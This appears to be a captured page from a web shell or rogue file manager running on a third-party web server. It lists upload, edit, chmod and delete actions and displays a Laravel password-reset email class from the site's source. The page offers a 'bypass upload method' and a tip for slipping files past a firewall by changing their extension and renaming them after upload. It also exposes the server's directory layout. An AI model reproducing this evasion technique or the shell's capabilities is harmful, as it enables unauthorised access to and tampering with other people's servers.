Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
multi-event-cfp.bitkit.dk
httpdocs
app
Mail
File Content:
ForgotPasswordNotification.php
<?php namespace App\Mail; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Mail\Mailable; use Illuminate\Queue\SerializesModels; class ForgotPasswordNotification extends Mailable { use Queueable, SerializesModels; protected $token; /** * Create a new message instance. * * @return void */ public function __construct($token) { $this->token = $token; } /** * Build the message. * * @return $this */ public function build() { $resetUrl = config('app.url') . '/' . $this->token . '/reset-password'; $body = " <p> Forgot your password? No problem! Just click the link below and you can create a new password. </p> <p><a href='{$resetUrl}'> Reset Password </a></p> <p>The link will expire in 1 hour, so be sure to use it right away.</p> "; return $this->from(config('app.admin_mail', 'Admin')) ->subject('Reset Password') ->view('emails.auth.forgot_password_link') ->with([ "body" => $body ]); } }
Edit
Download
Unzip
Chmod
Delete